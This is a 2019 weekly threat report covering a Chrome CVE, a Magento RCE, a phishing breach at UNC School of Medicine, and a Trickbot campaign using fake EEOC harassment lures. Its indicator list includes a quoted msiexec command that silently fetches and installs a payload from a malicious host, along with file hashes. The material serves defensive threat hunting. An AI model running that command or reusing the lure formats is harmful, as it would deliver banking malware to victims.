Thursday November 14th 2019
We’re back with another edition of the usually weekly threat report. This week we’re highlighting two critical vulnerabilities, a case of business email compromise for a medical school, and a Trickbot campaign targeting U.S. government offices.
If you haven’t updated Chrome recently, you might want to. In early November, a critical use-after-free vulnerability was disclosed for Google Chrome (CVE-2019-13720). Earlier this week a Proof-of-Concept exploit for the vulnerability was posted on YouTube by Tony Stack.
The vulnerabilities have been patched via Chrome version 78.0.3904.87 but older versions are being actively exploited. Users on the Exploit.in forum have been discussing the vulnerability which shows that many threat actors want to leverage the vulnerability against out of date versions of Chrome.
E-commerce platform Magento warned its users to apply a security patch for a remote code execution vulnerability tracked CVE-2019-8144 impacting Magento 2.3 prior to 2.3.3 or 2.3.2-p.
The vulnerability could allow unauthenticated attackers to deliver malicious payloads into a merchant’s site and execute it. On October 8, 2019, Magento released a security update to address the vulnerability, but some installations remain vulnerable for users who have not applied the security update. Users are advised to update to Magento Commerce 2.3.3 and the security-only patch 2.3.2-p2 to address the vulnerability.
In addition to applying security patches, Magento also recommends checking websites and servers to see if it was potentially compromised before upgrading.
Around 3,716 individuals may have been affected after a phishing and BEC incident which resulted in a data breach at the University of North Carolina School of Medicine. Some School of Medicine students fell victim to a cyber phishing incident via email accounts.
Between May 17, 2018, and June 18, 2018, an unauthorized third party was able to gain access to several email accounts that contain personal information of some patients, possibly related to treatments received in the UNC.
These email accounts contain information such as patients’ names, dates of birth, and demographic data such as addresses, health insurance information, health information, social security numbers, financial account information and/or credit card information.
Mail notifications to affected patients started being sent out on November 12, 2019. The university also offered limited monitoring and identity protection services to the affected individuals, which does not cover the lost damage to patients.
UNC School of Medicine is taking steps to prevent additional BEC compromise by adding multi-factor authentication and enrolling employees in security awareness training. There has been no mention if their UNC business practices will change to prevent sensitive patient information from being shared via email. Business processes involving sensitive information should not be conducted via email.
Fake sexual harassment complaints from the U.S. Equal Employment Opportunity Commission (EEOC) are the latest lure used by attackers to disseminate the Trickbot banking Trojan onto the devices of unsuspecting employees of large companies.
Based on availability data from Perch, this campaign is still very active with a first sighting on November 3rd, 2019. Based on the customers being targeted, the campaign seems mostly geared towards the financial service, education, retail, and health industries.
According to recent reports, the malware operators use information collected for each target to customize the phishing emails to look legitimate. The attackers use “Name_of_Victim – A grievance raised against you” subjects for each of the phishing emails to draw in the attention of their targets.
Additionally, the malicious attachments containing the Trickbot payloads have customized names and use the following format “Name_of_Victim – Harassment complaint letter (phone 111-222-3333).doc” to further entice the target into opening the attachment. Organizations should implement security monitoring processes to prevent, detect, and respond to phishing attacks. Enjoy some IoCs for your hunting pleasure.
2nd Stage Download (through MSI)
msiexec /i http://ftpthedocgrp[.]com/backup.msi /q
fb3909076f570782604a67a57f7b50b3a3fde18274a0d59557dded3da6f40dc5 6af150fdbc685171ad222648a6011fa77084b4f26c1c85106f896b98efa24043 4533f6a69614dcbb8c1ea9aa48dec41dd935df14d468603bac44c8978f0f91b7 ddae2b31b8bd170957dd5efc46bd5e9414181277fde2c95c8e792ee762433ebd 6b2ddd65039d42efb0110b8f198d01f0d5abf67cf43b17021486d87396136c32 5f24c41aa68951f744c9204344d2cae0f276e57ddd91442e02d1911d7c16d138 5b08241e83eb4b0188b3052a107bd796b3c32b84b882e23715f4d12ce318368c